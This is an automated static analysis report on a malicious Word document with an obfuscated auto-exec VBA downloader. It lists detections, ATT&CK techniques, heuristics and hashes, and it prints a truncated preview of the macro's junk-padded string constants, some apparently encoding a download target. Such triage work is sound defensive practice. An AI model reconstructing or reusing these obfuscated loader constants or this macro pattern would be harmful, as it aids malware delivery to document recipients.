MALICIOUS
Risk Score: 350
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer (inferred from the downloader classification and the obfuscated-loader shape; no download URL or network activity is recorded in this static report)
The file contains a heavily obfuscated VBA macro loader, indicated by multiple high and critical heuristic firings, including 'Obfuscated auto-exec VBA loader' and 'VBA p-code auto-exec with execution tokens'. The macro reconstructs its strings at runtime and is designed to execute code via CreateObject and CallByName, most likely to download and run a secondary payload. ClamAV detection as 'Doc.Downloader.Amphitryon-10013741-0' further supports its malicious downloader nature. Caveat for responders: the extracted source preview below shows only the obfuscated string constants — the decoder routine and the final COM/execution sink are not within the lines shown — and the only URLs extracted from the document are OOXML schema namespaces, so no payload URL or C2 indicator is recoverable from this report alone. Recover the decoded strings by stepping or emulating the decoder in an isolated environment before deriving network IOCs.
Heuristics (10)
- ClamAV: Doc.Downloader.Amphitryon-10013741-0 — severity: critical — rule: CLAMAV_DETECTION — ClamAV detected this file as malware: Doc.Downloader.Amphitryon-10013741-0
- VBA macros detected — severity: medium — 7 related findings — rule: OLE_VBA_MACROS — Document contains VBA macro code
- Obfuscated auto-exec VBA loader — severity: critical — rule: OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER — An auto-exec VBA routine reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source text. In this sample the extracted module is dominated by long string constants padded with '(', ')', ',' and '*' junk characters, which is consistent with the junk-token Replace-removal variant — confirm against the decoder routine in the full source.
- Document_Open macro — severity: high — rule: OLE_VBA_DOCOPEN — Document_Open event handler present; it runs automatically when the document is opened with macros enabled (Word auto-exec entry point).
- Workbook_Open macro — severity: high — rule: OLE_VBA_WBOPEN — Workbook_Open event handler present. Workbook_Open is the Excel auto-exec entry point; its detection alongside Document_Open in a Word module (ThisDocument) suggests either a dual-format loader or a token match in the compiled stream — verify in the full source.
- CreateObject call — severity: high — rule: OLE_VBA_CREATEOBJ — CreateObject call (late-bound COM instantiation). The target ProgID does not appear as a literal in the extracted source and is presumably reconstructed from the obfuscated constants at runtime.
- CallByName call — severity: high — rule: OLE_VBA_CALLBYNAME — CallByName call; it invokes a method or property on an object by a name supplied as a string, so the macro can reach execution methods without naming them statically in source.
- VBA p-code auto-exec with execution tokens — severity: high — rule: OLE_VBA_PCODE_AUTOEXEC_EXEC — Compiled VBA (p-code) / cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. Because the compiled p-code can diverge from the stored source text (VBA stomping), treat these tokens as authoritative over the decompressed source wherever the two disagree.
- Environ() call (env variable access) — severity: low — rule: OLE_VBA_ENVIRON — Environ() call; droppers commonly use it to resolve paths such as %TEMP% or %APPDATA% for a staged payload, though the variable read here is not visible in the preview.
- Embedded URL — severity: info — rule: EMBEDDED_URL — One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography — in document text (OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml — in document text (OLE body)
  All three are standard OOXML schema namespace identifiers; they are not network indicators and should not be added to blocklists.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7834 bytes | 66efc825f93362b8b341671021d78586a183265225013d01b2b35379c14f1dc1 |
Preview script — first 1,000 lines of the extracted script. The extract below is truncated; only the module attributes and the obfuscated string constants are shown, so the decoder routine and the execution sink are not within the visible lines.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Const cjUxNOomnpCzr As String = "c(Mf)k(FZdpIs*xu*wJRi)yVl(Q))L)WCGEzT*AmH)*D)Sev,qBaoX*g*)hrY,b*Untj*O"
Private Const kQCWZuYercz As String = "P*riu)qsv,GNT(jFEH))VQ,)Xt,n*kf,wm(o"
Private Const FBQxvCKwEmYejn As String = "qrgn)r)(ep, f*n(j)) garz(hp,(b*q) f,vu,G,"
Private Const IxWLgsPTJva As String = "r,k(,r*.t(g/(ft,nys/()r*tn(*zv*/zb,p).*lb)e(gf-t,)h//*:c,g)gu"
Private Const YxuIVAp As String = "*pr)kr"
Private Const OwAmTrdgIJRDFVKc As String = "*arc*B"
Private Const rhenpMvfqEG As String = "J)*gs(AktROD)C,yPp*S*TGdN*,v)c(lj*m)r(b,n"
Private Const UDMVwOrQnheJmW As String = "ar,c,B"
Private Const ynlkQfcYTHvSsDqdXo As String = "XR)Qj,pBn*w*KqaP,dJ(EM"
Private Const jtGHQFLoXKSkRycPe As String = "h**G)N,LE,mH(kp(eOcI)rB"
Private Const mquPSadwi As String = "znr*)e)gF*.(oqb*q(N"
Private Const doiZNTgpMPAUFsYRBb As String = "pE)MCb(VUY(Nd(s,uhWDSQPx*)Oqa(kF(r"
Private Const MmfCNlFvVDdHUkr As String = "Ugz*)jMb)Y,H,)tZB,n)xS"
Private Const IfymjOuPnHQiqeT As String = "FmBykW*u,,Sjbo(H))l(Or,)XGZ*x,s(feQ)Ut(J(ID*Ca)K*)gcd,iph,)qP*"
Private Const tKZQTGEpoSsmUnOLPdNI As String = "q*a)r*F"
Private Const ytPeoVNaDLYdC As String = "p,TBE*oFIi)*Jd,tu(O(VUZ,k,q(zg,NSYC(s*M*lQW(Gr,PH*b(w,fm,x(j,R)yneLDA(vKc)h"
Private Const rDPjISUyiEg As String = "sem)wyLfJ(tN*iAx()na)lUzq))MO(VIc(u,(B"
Private Const JYQUbNvpZxnh As String = "LRO*nC)k(jqw(JX)hD)IzE)gP)df*,Ge*lVc)xS*oN*uMa(,Q)AU)TBZWi(tm)p(yKv,rFH*"
Private Const SwEqzoTDHnQvem As String = "FT)OA))J(bZ*Yc,D(dU*x"
Private Const PxwJbeyEIivrNuQ As String = "W(tMu)(X)on(zk(K*(UV(cr)e,C*f(Yb*jBL,ZvOTEi)G(hl)pg),d(a(xH,D)m*,sPq*J"
Private Const vxFYiURuCA As String = "(Fo,vYi)(KO*QW,NRs,BSV*ZXrJdh)bqH)Dt)yf*TxA,waEG*j("
Private Const UkOMdWacYvoCZ As String = "u(tWHvQ)(g)TGC,Ai*,KY*d(Rj*sqx,X)h*E(FNb*eU(LP*k(mnwSz)(co(D)yVZa"
Private Const YxEioyujNRXsO As String = "bm)k,x*pR),K*LGfn*hDQaqW*sEz,Ud(yv(OoP*SJ,T,F,BX),eM)g*ZN*CI,jw)t*V,li,u,"
Private Const DeFXsHNyui As String = "sq(eu(aFGHz*XjdkL(YC,tv*,ofK)R)hBrx*U(pEA)ly*NM,TD*cO*iWg,*Im(w"
Private Const DbpxNPFQHVZ As String = "BPYbO,uk,J(Mf,U)mGDI*Fvqw)z)QWl*Ta*A,L*r*gec*dyXn"
Private Const guSLENaTIYFvdXcfUhK As String = "Vn*mE*JS)*DIM)(QXek)i(rtu,"
Private Const UakFWJuxRqAMb As String = "CZR*G"
Private Const gtIwoUHqTMehxyVX As String = "(k,bdO)oA)(Xxq)py(,JasGn)hR(Cc(l((mLjr*WEtF*uVv(*B(zDT*HgQeU(MSIY)i**Pw,f"
Private Const NxHuqBdKMVGlatfRs As String = "j*F*Ek)yC*dG)J,m*M(*YOZuNt)g,PbR(iUc"
Private Const IioSgKZ As String = "yy*ru()F.g,*cvepF,J"
Private Const fOTIMSFJAreEDstZC As String = "K((NLB)OdaSVJpw)g*oICY,M)W*reX,T*u"
Private Const WaKXYSodnxsJu As String = "(qryona,r ,ro, ,gfh(z fb((ep(n*Z"
Private Const bUkLEDtCAMreQmjFdNKP As String = "xZ*(lXv),cu(,y)nmgCIe)YhJULpQF(fa*A"
Private Const clEFZiAtHSOf As String = ",CEf)m,T*OdKZ,l*Q("
Private Const skZMEWrKuGbJPzSAo As String = ",lqb)O,r*fab)cfr,e"
Private Const DJXmHMv As String = "0.(6,.CG((GUYZK(erie)rF).2yzk,f(Z"
Private Const oyGaKCDPMcUi As String = "bF*Gr)J(*Xovj,h*S,xIQO"
Private Const XAvZgDHymLPfEquJo As String = "r,kr*).50((65(767511)32)(095,51,.0"
Private Const RIYDQKzaPfoZ As String = "GRT,"
Private Const JHdCXsRunvpt As String = "C,sXT,lH*UndZuwB,fzMYRSv,L(j*oqy)W(Pe*J"
Private Const TJoZznGIPOFNlU As String = "QZWHtIVp(dq),Lxk*um*w,bG)SyeXiB(f*,P)sY,har,j()C(n"
Private Const qMlfuaBWRZiK As String = "(U(MJczZ))uVW**LX,OmT)A*yN)DEQ(fh)Ss)qbviR,HFpP"
Private Const GZHyfVRcFtjUMTkvhNa As String = ",ryv)sbgr)(inf"
Private Const DCPLoENMq As String = "r(gv*e,j"
Private Const SMnzLHuoaERDPiINljO As String = ")Yl,w(NAmFR)(V,Kd)LQt(PrC(az(G(fu*c))Bqv(nxE()sZI*TX)oj*UH)iWD,,Se"
Private Const GrlSiTezuqyLHnjf As String = "n*klb*PgiI)Yy)hT(tJZ)S)B(q,RzKHV(Ax*Fs)N,)aru,D,)MeWG,wj)p(od)E,QU*v*"
Private Const tKyAOnvkzeUN As String =
... (truncated)